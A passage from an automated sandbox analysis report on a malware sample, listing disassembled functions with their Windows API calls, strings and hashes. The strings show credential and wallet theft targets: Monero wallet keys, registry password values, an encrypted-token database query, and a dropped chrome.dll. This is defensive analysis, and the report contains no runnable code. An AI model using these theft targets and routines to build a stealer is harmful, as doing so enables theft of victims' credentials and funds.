                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID: :
                              • API String ID: 2677904052-3653984579
                              • Opcode ID: 17f17ba501ba1470ec779dcdd3eb2ce9d74ae9d319718f2d751ce8a031179306
                              • Instruction ID: 878d316930832b414cb26e43a31d27e9ddaea5fd81692e0a175f540d05414f21
                              • Opcode Fuzzy Hash: 17f17ba501ba1470ec779dcdd3eb2ce9d74ae9d319718f2d751ce8a031179306
                              • Instruction Fuzzy Hash: 96313AB2904148EBDB04EBE4DD96DEE7779FF44301F504518F112EB2A0DA34A986CB91
                              Function 008160F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                                • Part of subcall function 00814800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00814889
                                • Part of subcall function 00814800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00814899
                              • InternetOpenA.WININET(00830DFB,00000001,00000000,00000000,00000000), ref: 0081615F
                              • StrCmpCA.SHLWAPI(?,015FE430), ref: 00816197
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008161DF
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00816203
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0081622C
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0081625A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00816299
                              • InternetCloseHandle.WININET(?), ref: 008162A3
                              • InternetCloseHandle.WININET(00000000), ref: 008162B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: 51c765e5d554f928a2f77da8ab4d73fc636777a37baf0ad2537569b1c1a520aa
                              • Instruction ID: c0b9f091e82e7e3fe803a8b8894282b7ed36ddc4dbaf35b1374f691f1fb23d47
                              • Opcode Fuzzy Hash: 51c765e5d554f928a2f77da8ab4d73fc636777a37baf0ad2537569b1c1a520aa
                              • Instruction Fuzzy Hash: E1514CB1A00218ABDB24DF94DC85BEE7779FF44305F008598E605EB180EB74AAC9CF95
                              Function 0089012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • type_info::operator==.LIBVCRUNTIME ref: 0089024D
                              • ___TypeMatch.LIBVCRUNTIME ref: 0089035B
                              • CatchIt.LIBVCRUNTIME ref: 008903AC
                              • CallUnexpected.LIBVCRUNTIME ref: 008904C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2356445960-393685449
                              • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction ID: e498a5ad6447f02e61760acaf208cc7e41744ed4ba75a69933b49eb35cae2506
                              • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                              • Instruction Fuzzy Hash: FEB16B71800209EFCF15FFA8C8859AEBBB5FF14314B18416AEA15EB212D731DA51CF96
                              Function 00817330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0081739A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00817411
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0081746D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 008174B2
                              • HeapFree.KERNEL32(00000000), ref: 008174B9
                              • task.LIBCPMTD ref: 008175B5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: f241527ef73177261b0bf835a13ac83d5e5c28a4d75e6638315486c80406e423
                              • Instruction ID: 8e1a5eaa1930f14aecdf3d282efd6c61b7e0c9902acc0be7f06fb14c4f6a86e8
                              • Opcode Fuzzy Hash: f241527ef73177261b0bf835a13ac83d5e5c28a4d75e6638315486c80406e423
                              • Instruction Fuzzy Hash: 0A6119B580416C9BDB24DB54CC55BDAB7BDFF58300F0081E9E649A6241EBB06BC9CF91
                              Function 0081BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • lstrlen.KERNEL32(00000000), ref: 0081BC6F
                                • Part of subcall function 00828FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828FE2
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0081BC9D
                              • lstrlen.KERNEL32(00000000), ref: 0081BD75
                              • lstrlen.KERNEL32(00000000), ref: 0081BD89
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: fc892b802ba619198674f2e12eec342b2175d0263802e064aab1952ee8dfd670
                              • Instruction ID: ffcf29170fdd6ca87c5ae2a28816d4a1f8911d7c6026c8d56a9dad2b8f77851f
                              • Opcode Fuzzy Hash: fc892b802ba619198674f2e12eec342b2175d0263802e064aab1952ee8dfd670
                              • Instruction Fuzzy Hash: E1B1ED729101289BCB18EBA4EDA6EEE7339FF54310F404558F506F6191EF346A89CB63
                              Function 00826A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 707a93d08efa7d7be0c1e79fa841f5bcbe0f094e16112a5205955596f98cddc1
                              • Instruction ID: 8e483c0cb21eeab4d6eb6403be6b6958d7003ac31fea3e5cfffd16e7f7c36894
                              • Opcode Fuzzy Hash: 707a93d08efa7d7be0c1e79fa841f5bcbe0f094e16112a5205955596f98cddc1
                              • Instruction Fuzzy Hash: EDF05E3094C399EFD348DFE0E84979CBB30FF04707F114295F60A9A1A0D6704A919B51
                              Function 008208A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00829850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,008208DC,C:\ProgramData\chrome.dll), ref: 00829871
                                • Part of subcall function 0081A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0081A098
                              • StrCmpCA.SHLWAPI(00000000,015F8970), ref: 00820922
                              • StrCmpCA.SHLWAPI(00000000,015F8980), ref: 00820B79
                              • StrCmpCA.SHLWAPI(00000000,015F88F0), ref: 00820A0C
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00820C35
                              Strings
                              • C:\ProgramData\chrome.dll, xrefs: 008208CD
                              • C:\ProgramData\chrome.dll, xrefs: 00820C30
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                              • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                              • API String ID: 585553867-663540502
                              • Opcode ID: a390b788fa9f64dec8af694514aec4f57a80148c54287c3d6d4ab28c624bdca6
                              • Instruction ID: b588ff8ce3286c1e9b6e2487b1cb1ca2bda312c8c7cd8738ff2d5fb87e34174a
                              • Opcode Fuzzy Hash: a390b788fa9f64dec8af694514aec4f57a80148c54287c3d6d4ab28c624bdca6
                              • Instruction Fuzzy Hash: 47A143717001189FCB1CEF68D996AED777AFF94300F508569E80A9F352DA309A45CB93
                              Function 00819E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00828CF0: GetSystemTime.KERNEL32(00830E1B,015FA008,008305B6,?,?,008113F9,?,0000001A,00830E1B,00000000,?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 00828D16
                              • wsprintfA.USER32 ref: 00819E7F
                              • lstrcat.KERNEL32(00000000,?), ref: 00819F03
                              • lstrcat.KERNEL32(00000000,?), ref: 00819F17
                              • lstrcat.KERNEL32(00000000,008312D8), ref: 00819F29
                              • lstrcpy.KERNEL32(?,00000000), ref: 00819F7C
                              • Sleep.KERNEL32(00001388), ref: 0081A013
                                • Part of subcall function 008299A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008299C5
                                • Part of subcall function 008299A0: Process32First.KERNEL32(0081A056,00000128), ref: 008299D9
                                • Part of subcall function 008299A0: Process32Next.KERNEL32(0081A056,00000128), ref: 008299F2
                                • Part of subcall function 008299A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00829A4E
                                • Part of subcall function 008299A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00829A6C
                                • Part of subcall function 008299A0: CloseHandle.KERNEL32(00000000), ref: 00829A79
                                • Part of subcall function 008299A0: CloseHandle.KERNEL32(0081A056), ref: 00829A88
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                              • String ID: D
                              • API String ID: 531068710-2746444292
                              • Opcode ID: 9cc46c63164b095050aff965efc666f6097070ce18e0beaa50253447132dd17b
                              • Instruction ID: 56b162b3dadd4d4995eebd6705649382a01ce0c53a7a729e4e3958b0ed3d1323
                              • Opcode Fuzzy Hash: 9cc46c63164b095050aff965efc666f6097070ce18e0beaa50253447132dd17b
                              • Instruction Fuzzy Hash: 025152B1944318ABDB24DBA4DC8AFDA7778BF44700F004598F60DAA2C1EA75AB84CF55
                              Function 0088F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                              Download Yara Rule
                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 0088FA1F
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0088FA27
                              • _ValidateLocalCookies.LIBCMT ref: 0088FAB0
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0088FADB
                              • _ValidateLocalCookies.LIBCMT ref: 0088FB30
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction ID: 24fdd351602af9826ba8fd03a372a37a1ce6eb3de5261f93c2a51896fd8ee7ec
                              • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                              • Instruction Fuzzy Hash: 96417235A00219AFCF14EF6CC884A9E7BB5FF49328F148165EA19EB392D7319905CB91
                              Function 00815000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0081501A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00815021
                              • InternetOpenA.WININET(00830DE3,00000000,00000000,00000000,00000000), ref: 0081503A
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00815061
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00815091
                              • InternetCloseHandle.WININET(?), ref: 00815109
                              • InternetCloseHandle.WININET(?), ref: 00815116
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
